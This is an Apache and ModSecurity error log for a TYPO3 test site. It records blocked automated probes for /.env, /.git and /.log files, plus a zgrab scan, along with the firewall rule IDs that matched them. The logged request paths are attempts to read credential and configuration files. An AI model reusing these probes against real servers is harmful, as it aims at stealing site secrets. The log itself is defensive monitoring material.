[Wed Oct 01 08:38:49.399142 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aNzMeWSEGjAj3vHc8W8ggQAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:49.399491 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aNzMeWSEGjAj3vHc8W8ggQAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:49.399769 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aNzMeWSEGjAj3vHc8W8ggQAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:49.858678 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aNzMeWSEGjAj3vHc8W8gggAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:49.858919 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aNzMeWSEGjAj3vHc8W8gggAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:49.859111 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aNzMeWSEGjAj3vHc8W8gggAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:50.319424 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aNzMemSEGjAj3vHc8W8ggwAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:50.319674 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aNzMemSEGjAj3vHc8W8ggwAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:50.319894 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aNzMemSEGjAj3vHc8W8ggwAAAAA"], referer: https://www.google.com/
[Wed Oct 01 16:45:41.304343 2025] [authz_core:error] [pid 3156624] [client 185.177.72.45:46146] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Oct 01 16:45:41.412201 2025] [:error] [pid 3143120] [client 185.177.72.45:46152] [client 185.177.72.45] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aN0-lb8WEktnhVfHjAYK8QAAAAQ"]
[Wed Oct 01 16:45:41.412417 2025] [:error] [pid 3143120] [client 185.177.72.45:46152] [client 185.177.72.45] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aN0-lb8WEktnhVfHjAYK8QAAAAQ"]
[Wed Oct 01 16:45:41.412582 2025] [:error] [pid 3143120] [client 185.177.72.45:46152] [client 185.177.72.45] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aN0-lb8WEktnhVfHjAYK8QAAAAQ"]
[Wed Oct 01 16:45:41.435457 2025] [:error] [pid 3143120] [client 185.177.72.45:46152] [client 185.177.72.45] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aN0-lb8WEktnhVfHjAYK8gAAAAQ"]
[Wed Oct 01 16:45:41.435665 2025] [:error] [pid 3143120] [client 185.177.72.45:46152] [client 185.177.72.45] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aN0-lb8WEktnhVfHjAYK8gAAAAQ"]
[Wed Oct 01 16:45:41.435822 2025] [:error] [pid 3143120] [client 185.177.72.45:46152] [client 185.177.72.45] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aN0-lb8WEktnhVfHjAYK8gAAAAQ"]
[Wed Oct 01 16:45:41.459014 2025] [:error] [pid 3143120] [client 185.177.72.45:46152] [client 185.177.72.45] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aN0-lb8WEktnhVfHjAYK8wAAAAQ"]
[Wed Oct 01 16:45:41.459219 2025] [:error] [pid 3143120] [client 185.177.72.45:46152] [client 185.177.72.45] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aN0-lb8WEktnhVfHjAYK8wAAAAQ"]
[Wed Oct 01 16:45:41.459377 2025] [:error] [pid 3143120] [client 185.177.72.45:46152] [client 185.177.72.45] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aN0-lb8WEktnhVfHjAYK8wAAAAQ"]
[Wed Oct 01 18:08:48.666559 2025] [authz_core:error] [pid 3156734] [client 213.209.157.232:60632] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Oct 02 10:22:39.513921 2025] [authz_core:error] [pid 3168869] [client 213.209.157.232:47620] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Oct 03 11:19:38.371631 2025] [authz_core:error] [pid 3191521] [client 213.209.157.93:50566] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Oct 03 12:39:51.717321 2025] [authz_core:error] [pid 3191526] [client 213.209.157.244:34342] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Oct 03 17:17:51.741260 2025] [authz_core:error] [pid 3205785] [client 195.178.110.223:44310] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.log
[Fri Oct 03 17:18:26.062085 2025] [authz_core:error] [pid 3205792] [client 195.178.110.223:36258] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.log
[Fri Oct 03 21:59:44.771581 2025] [authz_core:error] [pid 3191526] [client 195.178.110.223:34214] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Oct 03 23:50:25.411103 2025] [authz_core:error] [pid 3191526] [client 45.148.10.246:43456] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Oct 04 03:47:25.037937 2025] [:error] [pid 3217773] [client 45.139.104.204:42704] [client 45.139.104.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOB8rRRnn7xrNGxYbuY-hgAAAAM"]
[Sat Oct 04 03:47:25.038258 2025] [:error] [pid 3217773] [client 45.139.104.204:42704] [client 45.139.104.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOB8rRRnn7xrNGxYbuY-hgAAAAM"]
[Sat Oct 04 03:47:25.038497 2025] [:error] [pid 3217773] [client 45.139.104.204:42704] [client 45.139.104.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOB8rRRnn7xrNGxYbuY-hgAAAAM"]
[Sat Oct 04 03:55:34.199545 2025] [authz_core:error] [pid 3218593] [client 185.177.72.21:49410] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Oct 04 03:55:34.338631 2025] [:error] [pid 3218594] [client 185.177.72.21:49422] [client 185.177.72.21] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOB-lr51yTbnlew30puYCgAAAAg"]
[Sat Oct 04 03:55:34.338900 2025] [:error] [pid 3218594] [client 185.177.72.21:49422] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOB-lr51yTbnlew30puYCgAAAAg"]
[Sat Oct 04 03:55:34.339085 2025] [:error] [pid 3218594] [client 185.177.72.21:49422] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOB-lr51yTbnlew30puYCgAAAAg"]
[Sat Oct 04 03:55:34.370303 2025] [:error] [pid 3218594] [client 185.177.72.21:49422] [client 185.177.72.21] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aOB-lr51yTbnlew30puYCwAAAAg"]
[Sat Oct 04 03:55:34.370547 2025] [:error] [pid 3218594] [client 185.177.72.21:49422] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aOB-lr51yTbnlew30puYCwAAAAg"]
[Sat Oct 04 03:55:34.370716 2025] [:error] [pid 3218594] [client 185.177.72.21:49422] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aOB-lr51yTbnlew30puYCwAAAAg"]
[Sat Oct 04 03:55:34.402001 2025] [:error] [pid 3218594] [client 185.177.72.21:49422] [client 185.177.72.21] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aOB-lr51yTbnlew30puYDAAAAAg"]
[Sat Oct 04 03:55:34.402203 2025] [:error] [pid 3218594] [client 185.177.72.21:49422] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aOB-lr51yTbnlew30puYDAAAAAg"]
[Sat Oct 04 03:55:34.402464 2025] [:error] [pid 3218594] [client 185.177.72.21:49422] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aOB-lr51yTbnlew30puYDAAAAAg"]
[Sat Oct 04 17:59:35.550276 2025] [authz_core:error] [pid 3228313] [client 45.148.10.246:45314] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Oct 05 02:41:33.065365 2025] [authz_core:error] [pid 3238463] [client 213.209.157.93:51064] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Oct 05 14:23:44.004471 2025] [authz_core:error] [pid 3241337] [client 93.123.109.7:55408] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Oct 05 18:20:40.139120 2025] [authz_core:error] [pid 3241337] [client 157.245.116.135:42350] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Oct 07 08:25:44.035196 2025] [authz_core:error] [pid 3292642] [client 213.209.157.93:35680] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Oct 08 09:44:23.234882 2025] [:error] [pid 3325141] [client 3.138.185.30:60739] [client 3.138.185.30] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aOYWV0zJhLpqvtTEaynSvAAAAAk"]
[Wed Oct 08 09:44:23.235329 2025] [:error] [pid 3325141] [client 3.138.185.30:60739] [client 3.138.185.30] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aOYWV0zJhLpqvtTEaynSvAAAAAk"]
[Wed Oct 08 09:44:23.235507 2025] [:error] [pid 3325141] [client 3.138.185.30:60739] [client 3.138.185.30] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aOYWV0zJhLpqvtTEaynSvAAAAAk"]
[Wed Oct 08 22:19:09.505103 2025] [:error] [pid 3317606] [client 197.1.82.218:51932] [client 197.1.82.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aObHPaBOF70U-a_Wqa71cwAAAAY"]
[Wed Oct 08 22:19:09.506935 2025] [:error] [pid 3317606] [client 197.1.82.218:51932] [client 197.1.82.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aObHPaBOF70U-a_Wqa71cwAAAAY"]
[Wed Oct 08 22:19:09.507122 2025] [:error] [pid 3317606] [client 197.1.82.218:51932] [client 197.1.82.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aObHPaBOF70U-a_Wqa71cwAAAAY"]
[Wed Oct 08 23:53:29.471693 2025] [:error] [pid 3325141] [client 197.238.32.139:62236] [client 197.238.32.139] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aObdWUzJhLpqvtTEaynS7AAAAAk"]
